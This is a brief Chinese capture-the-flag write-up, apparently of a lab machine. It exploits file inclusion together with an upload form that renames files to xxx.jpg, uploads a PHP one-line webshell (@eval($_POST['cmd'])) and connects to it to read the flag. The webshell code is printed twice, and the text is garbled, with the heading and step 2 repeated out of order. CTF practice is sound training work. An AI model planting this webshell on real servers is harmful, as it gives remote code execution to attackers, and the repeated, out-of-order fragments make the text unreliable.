目录
2、上传界面可以上传任意文件,但上传后系统把文件名都改为xxx.jpg。
1、访问靶机发现存在文件包含。
2、上传界面可以上传任意文件,但上传后系统把文件名都改为xxx.jpg。
3、尝试上传PHP一句话木马cmd.php
<?php
@eval($_POST['cmd']);
?>
4、连接一句话木马,在根目录找到flag,
目录
2、上传界面可以上传任意文件,但上传后系统把文件名都改为xxx.jpg。
<?php
@eval($_POST['cmd']);
?>